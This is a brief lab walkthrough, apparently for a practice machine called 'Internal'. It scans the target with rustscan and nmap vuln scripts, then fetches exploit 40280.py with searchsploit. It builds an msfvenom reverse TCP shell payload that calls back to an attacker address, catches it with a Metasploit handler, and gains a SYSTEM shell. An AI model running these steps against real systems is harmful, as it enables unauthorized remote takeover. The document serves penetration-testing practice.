Internal
nmap
mkdir nmap
sudo rustscan -a 192.168.201.40 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan --script vuln
Looks like nmap's vuln scripts detected a CVE on the target. (Everything after -- is passed to nmap, so the NSE option is --script, not --scripts.)

Exploitation
Let's find the exploit source code for this CVE.

Mirror the exploit to your local machine
searchsploit -m windows/remote/40280.py
Create shellcode with msfvenom, as per the exploit's instructions.
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.49.201 LPORT=4444 EXITFUNC=thread -f python -v shell

Copy the generated shellcode into the exploit source code, replacing the shellcode that is already there.

Open msfconsole and execute the following:
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set lhost tun0
set exitfunc thread
run

Run the exploit
python 40280.py 192.168.201.40
You should then receive an NT AUTHORITY\SYSTEM shell.
